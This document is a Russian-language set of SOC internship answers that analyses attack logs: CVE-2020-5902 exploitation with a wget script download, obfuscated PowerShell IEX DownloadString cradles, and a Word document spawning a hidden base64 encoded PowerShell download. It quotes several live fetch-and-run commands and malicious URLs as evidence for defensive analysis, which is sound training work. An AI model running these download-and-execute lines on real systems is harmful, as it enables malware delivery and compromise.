---
tags: Стажировка - 2й этап. Интенсивы по специальности
---
# 1. Мониторинг ИБ. Работа специалиста SOC
## Task 1
### 1. Опишите, что происходит (чего добиваются атакующие)
* Сначала идет обращение к веб-интерфейсу tmui, в котором существует уязвимость CVE-2020-5902, позволяющая удаленному злоумышленнику, в том числе не прошедшему проверку подлинности, но имеющему доступ к конфигурационной утилите BIG-IP, выполнить произвольный код в программном обеспечении (remote code execution, RCE).
* Конструкция "../" позволяет перейти в родительскую директорию. (Источник: `https://habr.com/ru/company/pt/blog/511118/?ysclid=l8txrfwgdl868457363`)
* Далее происходит загрузка скрипта ohsitsvegawellrip.sh через wget с адреса 136.144.41.3.`http://136.144.41.3/Bigipdmcdmsklcmk/ohsitsvegawellrip.sh`
* Проверим данный адрес на ресурсе abuseIPDB. Видим 5% репортов.
* Спустимся ниже и видим, что с этого адреса происходил брутфорс ssh.
* Далее командой chmod 777 устанавливаются права всем на rwx.
* После запускается сам скрипт и далее скачивается файл с сервиса для создания коротких ссылок iplogger.
### 2. Выделите признаки, по которым понятно, что происходит атака
* Использование уязвимости CVE-2020-5902; конструкции "../".
* Скачивание скрипта, назначение прав в http-запросе.
### 3. Выделите IoС'и, которые могут быть использованы для выявления подобной активности в будущем
* Обновить уязвимую версию ПО.
* Блокировать скачивание/запуск вредоносного скрипта.
### 4. Укажите, каким образом можно удостовериться в том, удалось ли атакующим достигнуть того, чего они добивались этим запросом
* Просмотреть информацию о работе скрипта в журналах событий.
## Task 2
### 1. Что подозрительного в событии?
* В таске видим выполнение Power Shell скрипта Invoke-Expression. Он запускает указанную строку как команду.
* Подозрительно то, что имеется обфускация кода методом перестановки. Восстановив код, используя ключи в {...}, получим следующую команду: `Invoke-Expression (New-Object Net.Webclient).Downloadstring('http://tinyurl.com/y7ukpduz')`
* Запустив скрипт в ВМ, получим следующий результат.
### 2. С какой целью реализовано?
* Обфускация реализована с целью сокрытия кода, затруднения его понимания.
* Сам результат работы с целью вымогательства средств с пользователя ПК.
## Task 3
### 1. Что в этих событиях является подозрительным?
* Через процесс Winword.exe (при открывании документа "employee termination letter.docx") был запущен PowerShell, и выполнена команда закодированная в base64.
* Также, запускается процесс C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 после выполнения зашифрованного PowerShell-скрипта.
### 2. Какие признаки указанных событий на это указывают?
* Рассмотрев данное событие, можно установить, что PowerShell запущен через Winword.exe
* Значение CommandLine: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -sta -noni -w hidden -encodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBvAG0AbgBpAC0AYwBvAG4AcwB1AG0AZQByAC0AcAByADAAZAB1AGMAdABzAC4AdABrAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACcAKQA7AA`
* Значение ParentCommandLine: `"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\Downloads\employee termination letter.docx" `
* Расшифруем скрипт и получим следующее: `
IEX (New-Object System.Net.WebClient) DownloadString ('http://omni-consumer-pr0ducts.tk/favicon.ico');`
* Производится обращение к сайту по данному адресу и загрузка файла favicon.ico
* Далее выполняется процесс conhost.exe 0xffffffff -ForceV1 после запуска PowerShell скрипта.
* Также доменное имя, которое имеется в зашифрованном скрипте, фигурирует в событии
### 3. Какие IoC'и можно выделить из этих событий?
* CommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -sta -noni -w hidden -encodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBvAG0AbgBpAC0AYwBvAG4AcwB1AG0AZQByAC0AcAByADAAZAB1AGMAdABzAC4AdABrAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACcAKQA7AA
* DownloadString ('http://omni-consumer-pr0ducts.tk/favicon.ico')
* ParentCommandLine "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\Downloads\employee termination letter.docx"
* CommandLine \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
### 4. Опишите подробно суть подозрительных действий в системе, зафиксированных в этом журнале
* 07.12.2021 в 19:06:26.295 запускается дочерний процесс PowerShell и выполняется закодированный скрипт. Изначально запускается родительский процесс Winword.exe после открытия файла employee termination letter.docx.
* При выполнения скрипта происходит обращение к интернет-ресурсу и скачивается файл favicon.ico.
* После выполняется 07.12.2021 в 19:06:26.373 conhost.exe 0xffffffff -ForceV1, который читает информацию из пространства ядра. Родительский процесс при этом зашифрованный PowerShell скрипт из предыдущего события.
* Также после этого выполняются два PowerShell-скрипта.
## Task 4
### 1. Что произошло на узле?
* В SIEM-систему пришло событие со следующим текстом: "Обнаружена попытка выполнить потенциально опасную команду на узле larteshina.plat.form". Ключ, на который обратила внимание SIEM, это выполнения скрипта в скрытом виде.
* Также виден сам скрипт, который является подозрительным.
* Раскодировали скрипт. Внутри увидели снова base64 и GZIP.
* Деобфусцировали и раскодировали. Получили код скрипта.
* Вновь появившуюся строку base64 раскодировать не удалось.
* На узле был выполнен вредоносный скрипт закодированный base64, а также сжат gzip'ом.
### 2. С помощью чего это удалось добиться?
* Выполнение скрипта удалось добиться благодаря сжатию через gzip.
### 3. Если есть, то укажите адрес C&C и порт.
* Не обнаружил.
## Task 5
### 1. К какому семейству принадлежит данное ВПО?
* Применив поиск в сети Интернет удалось определить, что ВПО является трояном. Также виден http адрес разбитый на блоки, к которому идёт обращение.
### 2. Перечислите имена всех файлов, которые могли быть загружены на компьютер с помощью данного скрипта.
* На сайте Dr.Web имеется следующая информация. Http-адрес в скрипте совпадает с данными Dr.Web, что дополнительно подтверждает вредоносность скрипта.
## Task 6
### 1. Опишите, что же на самом деле произошло на компьтере пользователя.
* Пользователь открывает скачанный zip архив.
* После запускает файл l1.bat.
* Далее видим PowerShell-скрипт с параметрами -nol (nologo), -nop (noprofile), -ep bypass (execution policy) для обхода политик выполнения PS-скриптов.
* После выполняется ещё один скрипт закодированный base64.
* Раскодировали его. Обнаруживаем снова закодированную строку.
* Раскодировали её, получили IP-адрес.
* Данный адрес также фигурирует в логах, как DstIP.
* Также присутствует удаленное выполнение команд в PowerShell при помощи Invoke-Command.
* Помимо этого в событиях имеется протокол взаимодействия udp, адрес источника и адрес назначения, который был указан в зашифрованном скрипте.
* Исходя из всего, можно предположить, что злоумышленник получил удаленный доступ к компьютеру жертвы.
### 2. Укажите необходимые подробности и признаки, по которым можно выявлять подобную активность, а так же необходимые данные для осуществления мер по реагированию.
* Детект на скрытое выполнение скриптов (также флаги -nol, -nop, -ep).
* Мероприятия по повышению осведомлености сотрудников в области ИБ для соблюдения осторожности и бдительности при запуске/скачивании неизвестных/подозрительных файлов.
Sign in with Wallet
Connect another wallet